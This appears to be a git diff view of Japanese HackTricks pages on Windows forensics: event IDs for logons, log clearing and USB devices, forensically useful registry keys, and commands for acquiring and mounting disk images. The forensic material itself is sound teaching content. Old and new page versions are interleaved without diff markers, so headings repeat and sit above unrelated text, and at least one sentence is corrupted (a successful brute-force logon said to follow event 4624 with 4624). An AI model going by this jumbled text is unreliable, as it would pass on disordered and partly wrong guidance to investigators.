* **11 (cache interactive)**: ドメインコントローラに連絡できなかったため、最後にキャッシュされた資格情報を使用してアクセスされた
* **12 (cache remote interactive)**: キャッシュされた資格情報を使用してリモートでログイン10と11の組み合わせ
* **13 (cached unlock)**: キャッシュされた資格情報を使用してロックされたマシンをアンロック
#### EventID 4616:
- **時間の変更**: システム時間の変更、イベントのタイムラインを曖昧にする可能性があります。
この投稿では、これらのログインタイプをすべて模倣し、どれでメモリから資格情報をダンプできるかを見つけることができます:[https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)
#### EventID 6005および6006:
- **システムの起動およびシャットダウン**: EventID 6005はシステムの起動を示し、EventID 6006はシャットダウンを示します。
イベントのステータスとサブステータス情報は、イベントの原因に関する詳細を示すことができます。たとえば、Event ID 4625の次のステータスとサブステータスコードを見てみてください
#### EventID 1102:
- **ログの削除**: 不正行為を隠すための赤信号であるセキュリティログのクリア。
![](<../../../.gitbook/assets/image (455).png>)
#### USBデバイストラッキングのためのEventID
- **20001 / 20003 / 10000**: USBデバイスの初回接続。
- **10100**: USBドライバーの更新。
- **EventID 112**: USBデバイスの挿入時刻。
これらのログインタイプや資格情報ダンプの機会をシミュレートする実践的な例については、[Altered Securityの詳細ガイド](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)を参照してください。
イベントの詳細、特にEvent ID 4625でのステータスおよびサブステータスコードは、イベントの原因に関するさらなる洞察を提供します。
### Windowsイベントの回復
Windowsイベントを回復するためには、疑わしいPCの電源を**抜く**ことを強くお勧めします。削除された場合、[**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor)というツールが役立つ可能性があります。**evtx**拡張子を指定しています。
削除されたWindowsイベントを回復する可能性を高めるためには、疑わしいコンピューターの電源を直接抜いて電源を切ることをお勧めします。`.evtx`拡張子を指定する回復ツールである**Bulk_extractor**を使用して、このようなイベントを回復しようとすることをお勧めします。
## Windowsイベントでの一般的な攻撃の特定
### Windowsイベントを通じた一般的な攻撃の特定
* [https://redteamrecipe.com/event-codes/](https://redteamrecipe.com/event-codes/)
一般的なサイバー攻撃を特定するためにWindowsイベントIDを利用する包括的なガイドについては、[Red Team Recipe](https://redteamrecipe.com/event-codes/)を参照してください。
### ブルートフォース攻撃
#### 総当たり攻撃
ブルートフォース攻撃は、**複数のEventID 4625が表示**されるため、簡単に特定できます。攻撃が**成功した**場合、EventID 4624の後に**EventID 4624が表示**されます。
複数のEventID 4625レコードによって識別され、攻撃が成功した場合はEventID 4624が続きます。
### 時間の変更
#### 時間の変更
これはフォレンジックチームにとって非常に困難であり、すべてのタイムスタンプが変更されます。このイベントは、セキュリティイベントログ内のEventID 4616によって記録されます。
EventID 4616によって記録され、システム時間の変更はフォレンジック分析を複雑にします。
### USBデバイス
#### USBデバイストラッキング
次のSystem EventIDsが役立ちます
USBデバイストラッキングのための有用なシステムイベントIDには、初回使用のための20001/20003/10000、ドライバー更新のための10100、および挿入タイムスタンプのためのDeviceSetupManagerからのEventID 112が含まれます。
* 20001 / 20003 / 10000: 初めて使用された時
* 10100: ドライバーの更新
#### システム電源イベント
DeviceSetupManagerのEventID 112には、挿入された各USBデバイスのタイムスタンプが含まれています。
EventID 6005はシステムの起動を示し、EventID 6006はシャットダウンを示します。
### 電源のオフ / オン
#### ログの削除
"Event Log"サービスのID 6005はPCがオンになったことを示します。ID 6006はPCがオフになったことを示します。
### ログの削除
セキュリティEventID 1102は、ログが削除されたことを示します。
セキュリティEventID 1102はログの削除を示し、フォレンジック分析にとって重要なイベントです。

222
forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View file

@ -1,206 +1,90 @@
# インタレスティングなWindowsレジストリキー
## インタレスティングなWindowsレジストリキー
### インタレスティングなWindowsレジストリキー
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい****HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する:[**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私たちをフォローする [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>
## **Windowsシステム情報**
### バージョン
### **Windowsバージョンと所有者情報**
- **`Software\Microsoft\Windows NT\CurrentVersion`**にあるWindowsバージョン、Service Pack、インストール時間、登録所有者の名前が簡単に見つかります。
- **`Software\Microsoft\Windows NT\CurrentVersion`**: Windowsのバージョン、Service Pack、インストール時間、登録所有者
### **コンピューター名**
- ホスト名は**`System\ControlSet001\Control\ComputerName\ComputerName`**の下にあります。
### ホスト名
### **タイムゾーン設定**
- システムのタイムゾーンは**`System\ControlSet001\Control\TimeZoneInformation`**に保存されています。
- **`System\ControlSet001\Control\ComputerName\ComputerName`**: ホスト名
### **アクセス時間の追跡**
- デフォルトでは、最終アクセス時間の追跡はオフになっています(**`NtfsDisableLastAccessUpdate=1`**)。有効にするには、次のコマンドを使用します:
`fsutil behavior set disablelastaccess 0`
### タイムゾーン
### WindowsバージョンとService Pack
- **Windowsバージョン**はエディションたとえば、Home、Proとリリースたとえば、Windows 10、Windows 11を示し、**Service Pack**は修正と時に新機能を含む更新です。
- **`System\ControlSet001\Control\TimeZoneInformation`**: タイムゾーン
### 最終アクセス時間の有効化
- 最終アクセス時間の追跡を有効にすると、ファイルが最後に開かれた時刻がわかり、フォレンジック分析やシステムモニタリングに重要です。
### 最終アクセス時刻
### ネットワーク情報の詳細
- レジストリには、ネットワーク構成に関する包括的なデータが保存されており、**ネットワークの種類無線、ケーブル、3G**や**ネットワークのカテゴリPublic、Private/Home、Domain/Work**などが含まれており、ネットワークセキュリティ設定と権限を理解する上で重要です。
- **`System\ControlSet001\Control\Filesystem`**: 最終アクセス時刻(デフォルトでは`NtfsDisableLastAccessUpdate=1`で無効になっていますが、`0`の場合は有効)。
- 有効にするには:`fsutil behavior set disablelastaccess 0`
### シャットダウン時刻
- `System\ControlSet001\Control\Windows`: シャットダウン時刻
- `System\ControlSet001\Control\Watchdog\Display`: シャットダウン回数XPのみ
### ネットワーク情報
- **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**: ネットワークインターフェース
- **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache`**: ネットワーク接続が行われた最初と最後の時刻、VPN経由の接続
- **`Software\Microsoft\WZCSVC\Parameters\Interfaces{GUID}`XP用 & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles`**: ネットワークタイプ0x47-ワイヤレス、0x06-ケーブル、0x17-3Gとカテゴリ0-パブリック、1-プライベート/ホーム、2-ドメイン/ワーク)、最終接続
### 共有フォルダ
- **`System\ControlSet001\Services\lanmanserver\Shares\`**: 共有フォルダとその構成。**クライアントサイドキャッシュ**CSCFLAGSが有効になっている場合、共有ファイルのコピーがクライアントとサーバーの`C:\Windows\CSC`に保存されます。
- CSCFlag=0 -> ユーザーはデフォルトでキャッシュするファイルを指定する必要があります
- CSCFlag=16 -> ドキュメントの自動キャッシュ。共有フォルダからユーザーが開くすべてのファイルとプログラムが、「パフォーマンスを最適化」のチェックを外して「オフラインで使用可能」になります。
- CSCFlag=32 -> 前のオプションと同様ですが、「パフォーマンスを最適化」のチェックが入っています
- CSCFlag=48 -> キャッシュが無効になっています。
- CSCFlag=2048: この設定はWin 78にのみあり、[「シンプルなファイル共有」を無効にするか、「詳細」共有オプションを使用するまでデフォルトの設定です。また、「ホームグループ」のデフォルト設定のようです。
- CSCFlag=768 -> この設定は共有プリンタデバイスでのみ見られました。
### クライアントサイドキャッシュCSC
- **CSC**は共有ファイルのキャッシュを使用してオフラインファイルアクセスを向上させます。異なる**CSCFlags**設定は、どのファイルがどのようにキャッシュされるかを制御し、特に一時的な接続がある環境ではパフォーマンスやユーザーエクスペリエンスに影響します。
### 自動起動プログラム
- `Run`および`RunOnce`レジストリキーにリストされているプログラムは、自動的に起動され、システムの起動時間に影響を与え、マルウェアや不要なソフトウェアの特定に興味を持つポイントになる可能性があります。
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
- `Software\Microsoft\Windows\CurrentVersion\Runonce`
- `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`
- `Software\Microsoft\Windows\CurrentVersion\Run`
### Shellbags
- **Shellbags**はフォルダビューの設定だけでなく、フォルダへのアクセスのフォレンジック証拠も提供します。フォルダがもはや存在しなくても、他の手段では明らかでないユーザーのアクティビティを明らかにするために貴重です。
### エクスプローラ検索
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordwheelQuery`: エクスプローラ/ヘルパーを使用してユーザーが検索した内容。`MRU=0`のアイテムが最後のものです。
### 入力パス
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`: エクスプローラで入力されたパスW10のみ
### 最近のドキュメント
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`: ユーザーが最近開いたドキュメント
- `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word}\FileMRU`:最近のオフィスドキュメント。バージョン:
- 14.0 Office 2010
- 12.0 Office 2007
- 11.0 Office 2003
- 10.0 Office X
- `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word} UserMRU\LiveID_###\FileMRU`: 最近のオフィスドキュメント。バージョン:
- 15.0 Office 2013
- 16.0 Office 2016
### MRUs
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU`
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LasVisitedPidlMRU`
実行された実行可能ファイルのパスを示します
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Op enSaveMRU`XP
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Op enSavePidlMRU`
開かれたウィンドウ内のファイルを示します
### 最後に実行されたコマンド
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Policies\RunMR`
### User AssistKey
- `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`
GUIDはアプリケーションのIDです。保存されるデータ
- 最終実行時刻
- 実行回数
- GUIアプリケーション名絶対パスなどの情報を含む
- フォーカス時間とフォーカス名
## Shellbags
ディレクトリを開くと、Windowsはそのディレクトリの視覚化方法に関するデータをレジストリに保存します。これらのエントリはShellbagsとして知られています。
エクスプローラアクセス:
- `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
- `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
デスクトップアクセス:
- `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
- `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
Shellbagsを分析するには、[**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md)を使用でき、フォルダの**MAC時刻**と、フォルダがアクセスされた**最初の時刻と最後の時刻**に関連する**作成日時と変更日時**を見つけることができます。
以下の画像から2つの重要な点を把握してください
1. **E:に挿入されたUSBのフォルダ名**がわかります
2. **シェルバッグが作成および変更された時刻**とフォルダが作成およびアクセスされた時刻がわかります
![](<../../../.gitbook/assets/image (475).png>)
## USB情報
### デバイス情報
レジストリ`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`はPCに接続された各USBデバイスを監視します。\
このレジストリ内で次の情報を見つけることができます:
- メーカー名
- 製品名とバージョン
- デバイスクラスID
- ボリューム名(次の画像ではハイライトされたサブキーがボリューム名です)
![](<../../../.gitbook/assets/image (477).png>)
![](<../../../.gitbook/assets/image (479) (1).png>)
さらに、レジストリ`HKLM\SYSTEM\ControlSet001\Enum\USB`をチェックし、サブキーの値を比較することでVID値を見つけることができます。
![](<../../../.gitbook/assets/image (478).png>)
前述の情報を使用して、レジストリ`SOFTWARE\Microsoft\Windows Portable Devices\Devices`から**`{GUID}`**を取得できます:
![](<../../../.gitbook/assets/image (480).png>)
### デバイスを使用したユーザー
デバイスの**{GUID}**を持っていると、**すべてのユーザーのNTUDER.DATハイブをチェック**し、GUIDを検索して、その中の1つで見つかるまで探すことができます`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2`)。
![](<../../../.gitbook/assets/image (481).png>)
### 最後にマウントされたデバイス
レジストリ`System\MoutedDevices`をチェックすると、**最後にマウントされたデバイス**を見つけることができます。次の画像では、`E:`に最後にマウントされたデバイスがToshibaであることがわかりますツールRegistry Explorerを使用
![](<../../../.gitbook/assets/image (483) (1) (1).png>)
### USB情報とフォレンジック
- USBデバイスに関するレジストリに保存されている詳細は、コンピューターに接続されたデバイスを追跡するのに役立ち、機密ファイルの転送や不正アクセスのインシデントにデバイスを関連付ける可能性があります。
### ボリュームシリアル番号
- **ボリュームシリアル番号**は、ファイルシステムの特定のインスタンスを追跡するために重要であり、ファイルの起源を異なるデバイス間で確立する必要があるフォレンジックシナリオで役立ちます。
`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`にはボリュームシリアル番号が含まれています。**ボリューム名とボリュームシリアル番号を知ることで、その情報を使用するLNKファイルからの情報を関連付ける**ことができます。
### **シャットダウンの詳細**
- シャットダウン時刻とカウントXPの場合のみは、**`System\ControlSet001\Control\Windows`**および**`System\ControlSet001\Control\Watchdog\Display`**に保存されています。
USBデバイスがフォーマットされると
### **ネットワーク構成**
- 詳細なネットワークインターフェイス情報については、**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**を参照してください。
- VPN接続を含む最初と最後のネットワーク接続時刻は、**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**のさまざまなパスにログが記録されます。
- 新しいボリューム名が作成されます
- 新しいボリュームシリアル番号が作成されます
- 物理シリアル番号は保持されます
### **共有フォルダ**
- 共有フォルダと設定は**`System\ControlSet001\Services\lanmanserver\Shares`**にあります。クライアントサイドキャッシュCSCの設定はオフラインファイルの利用可能性を決定します。
### タイムスタンプ
### **自動的に起動するプログラム**
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**などのパスや`Software\Microsoft\Windows\CurrentVersion`の類似エントリには、起動時に実行されるプログラムの詳細が記載されています。
`System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{83da6326-97a6-4088-9453-a1923f573b29}\`には、デバイスが接続された最初と最後の時刻が記載されています:
### **検索と入力されたパス**
- エクスプローラーの検索と入力されたパスは、**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**のWordwheelQueryおよびTypedPathsの下にレジストリで追跡されます。
- 0064 -- 最初の接続
- 0066 -- 最後の接続
- 0067 -- 切断
### **最近使用したドキュメントとOfficeファイル**
- アクセスした最近のドキュメントとOfficeファイルは、`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`および特定のOfficeバージョンのパスに記録されます。
![](<../../../.gitbook/assets/image (482).png>)
### **最近使用したMRUアイテム**
- 最近のファイルパスとコマンドを示すMRUリストは、`NTUSER.DAT`のさまざまな`ComDlg32`および`Explorer`のサブキーに保存されています。
<details>
### **ユーザーアクティビティの追跡**
- ユーザーアシスト機能は、**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**で、実行回数や最終実行時刻などの詳細なアプリケーション使用統計を記録します。
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
### **Shellbags分析**
- フォルダアクセスの詳細を明らかにするShellbagsは、`USRCLASS.DAT`および`NTUSER.DAT`の`Software\Microsoft\Windows\Shell`に保存されています。分析には**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**を使用してください。
HackTricksをサポートする他の方法
### **USBデバイス履歴**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**および**`HKLM\SYSTEM\ControlSet001\Enum\USB`**には、接続されたUSBデバイスに関する詳細な情報が含まれており、製造元、製品名、接続時刻などが記載されています。
- 特定のUSBデバイスに関連付けられたユーザーは、デバイスの**{GUID}**を検索して`NTUSER.DAT`ハイブから特定できます。
- 最後にマウントされたデバイスとそのボリュームシリアル番号は、それぞれ`System\MountedDevices`および`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`を通じて追跡できます。
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する:[**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
このガイドは、Windowsシステムでの詳細なシステム、ネットワーク、およびユーザーアクティビティ情報にアクセスするための重要なパスと方法を簡潔かつ使いやすくまとめたものです。

81
generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
View file

@ -1,14 +1,14 @@
# イメージの取得とマウント
# 画像取得とマウント
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>
@ -20,34 +20,6 @@
dd if=/dev/sdb of=disk.img
```
### dcfldd
dcfldd is an enhanced version of the dd command, specifically designed for forensic imaging tasks. It provides additional features and options that are useful for acquiring and copying disk images.
dcfldd can be used to acquire disk images from both physical and logical devices. It supports various input and output formats, including raw, EWF (Expert Witness Format), and AFF (Advanced Forensic Format).
To acquire an image using dcfldd, you need to specify the input and output devices or files. You can also set options such as block size, hash algorithm, and progress reporting.
Here is the basic syntax for acquiring an image with dcfldd:
```
dcfldd if=<input> of=<output> [options]
```
Some commonly used options include:
- `bs`: Specifies the block size for reading and writing data.
- `hash`: Specifies the hash algorithm to use for verifying the integrity of the image.
- `hashwindow`: Specifies the size of the hash window.
- `hashlog`: Specifies the file to store the hash values.
- `statusinterval`: Specifies the interval for displaying progress status.
For example, to acquire an image from a physical device and calculate the MD5 hash, you can use the following command:
```
dcfldd if=/dev/sda of=image.dd hash=md5
```
dcfldd is a powerful tool for acquiring disk images in a forensic investigation. It provides advanced features and options that can help ensure the integrity and accuracy of the acquired images.
```bash
#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
@ -61,7 +33,7 @@ ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --descript
```
### EWF
[**ewfツール**](https://github.com/libyal/libewf)を使用してディスクイメージを生成することができます。
[**ewf tools**](https://github.com/libyal/libewf)を使用してディスクイメージを生成できます。
```bash
ewfacquire /dev/sdb
#Name: evidence
@ -82,7 +54,7 @@ ewfacquire /dev/sdb
### いくつかのタイプ
**Windows**では、無料版のArsenal Image Mounter[https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)を使用して、**フォレンジックイメージをマウント**することができます。
**Windows**では、無料版のArsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) を使用して、**フォレンジックイメージをマウント**することができます。
### Raw
```bash
@ -95,22 +67,11 @@ mount evidence.img /mnt
```
### EWF
EWFEnCase Evidence Fileは、ディスクイメージの作成と分析に使用されるフォレンジックファイルフォーマットです。EWFフォーマットは、ディスクのセクタ単位でデータを取得し、証拠の整合性を保つためにハッシュ値を使用します。
### EWF
EWFファイルを作成するには、次の手順を実行します。
### EWF
1. EWFファイルの作成に使用するディスクを特定します。
2. EWFファイルの作成方法を選択します。例えば、物理ディスク、論理ディスク、またはファイルとして作成することができます。
3. EWFファイルの作成時に使用するハッシュアルゴリズムを選択します。一般的なアルゴリズムには、MD5、SHA-1、SHA-256などがあります。
4. EWFファイルの作成を開始します。
EWFファイルをマウントするには、次の手順を実行します。
1. EWFファイルをマウントするためのディレクトリを作成します。
2. EWFファイルを指定してマウントコマンドを実行します。マウントコマンドは、使用しているオペレーティングシステムによって異なる場合があります。
3. マウントが成功したら、指定したディレクトリにアクセスしてファイルを分析することができます。
EWFフォーマットは、ディスクイメージの作成と分析において広く使用されています。証拠の整合性を保ちながらデータを取得するため、フォレンジック調査において信頼性の高い手法とされています。
### EWF
```bash
#Get file type
file evidence.E01
@ -127,12 +88,12 @@ mount output/ewf1 -o ro,norecovery /mnt
```
### ArsenalImageMounter
これは、ボリュームをマウントするためのWindowsアプリケーションです。[ここからダウンロードできます](https://arsenalrecon.com/downloads/)
Windowsアプリケーションでボリュームをマウントできます。[こちら](https://arsenalrecon.com/downloads/)からダウンロードできます。
### エラー
* **`cannot mount /dev/loop0 read-only`** この場合、フラグ **`-o ro,norecovery`** を使用する必要があります。
* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** この場合、マウントに失敗しました。ファイルシステムのオフセットがディスクイメージと異なるためです。セクターサイズと開始セクターを見つける必要があります。
- **`cannot mount /dev/loop0 read-only`** この場合、フラグ **`-o ro,norecovery`** を使用する必要があります。
- **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** この場合、マウントに失敗したのは、ファイルシステムのオフセットがディスクイメージと異なるためです。セクターサイズと開始セクターを見つける必要があります。
```bash
fdisk -l disk.img
Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
@ -145,7 +106,7 @@ Disk identifier: 0x00495395
Device Boot Start End Sectors Size Id Type
disk.img1 2048 208895 206848 101M 1 FAT12
```
セクターサイズは**512**で、開始位置は**2048**です。次のようにイメージをマウントします:
セクターサイズが**512**で、開始位置が**2048**であることに注意して、次のようにイメージをマウントします:
```bash
mount disk.img /mnt -o ro,offset=$((2048*512))
```
@ -153,10 +114,10 @@ mount disk.img /mnt -o ro,offset=$((2048*512))
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう。
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>

2698
generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
View file

File diff suppressed because it is too large Load diff

222
